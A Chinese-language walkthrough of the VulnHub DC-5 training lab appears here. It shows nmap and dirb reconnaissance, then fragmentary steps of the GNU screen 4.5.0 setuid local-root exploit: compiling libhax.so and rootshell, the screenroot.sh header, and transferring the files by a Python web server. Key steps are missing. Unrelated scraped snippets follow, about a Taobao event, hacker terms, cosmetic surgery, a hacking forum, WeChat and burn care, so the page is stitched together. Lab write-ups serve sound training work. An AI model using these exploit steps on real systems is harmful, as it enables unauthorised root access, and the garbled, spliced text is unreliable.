靶场名称: DC: 5
靶场发布时间:2019-4-21
靶场地址:https://www.vulnhub.com/entry/dc-5,314/
靶场描述:
DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with intermediate or better experience. Time will tell (as will feedback).
As far as I am aware, there is only one exploitable entry point to get in (there is no SSH either). This particular entry point may be quite hard to identify, but it is there. You need to look for something a little out of the ordinary (something that changes with a refresh of a page). This will hopefully provide some kind of idea as to what the vulnerability might involve.
And just for the record, there is no phpmailer exploit involved. :-)
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
But if you're really, really stuck, you can watch this video which shows the first step.
VMware虚拟机(桥接模式)
获取靶机的IP
nmap -sn 192.168.3.0/24
使用nmap来查看靶机的端口信息和系统信息等等
首先去查看80端口的web服务
没有什么明显的信息就 一个留言框,使用dirb扫描一下目录
没有扫描到什么有用的页面,一些说明文件尝试也没有
继续尝试留言框
提交后年份就变了
gcc -fPIC -shared -ldl -o libhax.so libhax.c
报错,但是程序出来了
第二步:创建rootshell并编译文件(攻击机编译即可)
gcc -o rootshell rootshell.c
第三步:修改.sh文件
#!/bin/bash # screenroot.sh # setuid screen v4.5.0 local root exploit # abuses ld.so.preload overwriting to get root. # bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html # HACK THE PLANET # ~ infodox (25/1/2017) echo "~ gnu/screenroot ~" echo "[+] First, we create our shell and library..."
screen -ls # screen itself is setuid,so...
/tmp/rootshell
在保存文件的时候 需要执行运行环境 不然会报错的
把这三个文件上传到靶机中
直接下载libhax.so (apache服务下载不下来)
使用 python -m http.server port 既可以下载 chmod777 权限后 就获取到root权限
相信大家这两天都在玩淘宝双十一养猫组队的活动,今年的养猫活动和去年的盖楼活动有一些不一样,可能很多朋友还不太熟悉应该怎么玩,现在还有很多淘宝双十一养猫脚本和养猫群,那么接下来大家就和小编一起了解一下2...
本文导读目录: 1、黑客要具备哪些知识? 2、黑客常用到的术语有哪些 3、黑客基础 4、黑客术语有哪些,是什么意思啊? 5、关于黑客常用术语 6、黑客需要学什么? 7、黑客那学...
作为2019成都医美月的参与者,为了让求美者更多了解医美,正确选择适合自己的医美项目,7月30日,成都市宜兴医美医院举办了“皮肤与注射美容知识详解”专题沙龙讲座。成都宜兴微整形科谢文院长为您带来了...
流光5.0正式版:流光5.0Build3310官方版: 推荐你个免费学黑客的好论坛梦想黑客联盟论坛1、梦想黑客联盟的版主比较负责2、梦想黑客联盟论坛上还有很多的教程和一些会员实践的心德都是很不错。 什...
从2011年初推出,微信的增长速度之快可谓让人叹为观止,从当年的五千万到3个亿,用时仅不到3年。到2018年,微信已经完美击溃所有竞争对手,成为用户群最大的社交app,微信的成功当然不是偶然,它不断追...
观众朋友们大家好,我是村夫,每天给大家分享实用,有趣的生活小技巧,生活小妙招。 今天跟大家聊一聊, 被开水烫伤或者被油烫伤的话题,平时做饭烧水或者炒菜的时候,被烫伤很多人都经历过,被烫伤了没有及时处...